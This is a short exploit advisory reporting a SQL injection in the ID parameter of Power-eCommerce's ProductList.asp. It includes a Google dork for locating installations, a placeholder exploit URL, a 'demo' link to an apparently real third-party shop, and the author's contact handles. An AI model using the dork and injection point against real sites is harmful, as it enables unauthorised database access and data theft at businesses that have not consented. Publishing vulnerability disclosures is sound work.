# Exploit Title: Power-eCommerce SQL Injection Vulnerability
# Date: 2020-05-09
# Author: Milad Karimi
# Contact: miladgrayhat@gmail.com
# Google Dork: intext:"Powered by Power-eCommerce"
# Version: All Version
# Tested on: windows 10 , firefox
# CVE : CWE-89
Vulnerable file
/ProductList.asp?ID=SQLi
Exploit
http://www.vuln.com/ProductList.asp?ID=SQLi
Demo:
http://www.tonermill.com/ProductList.asp?ID=3571
************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************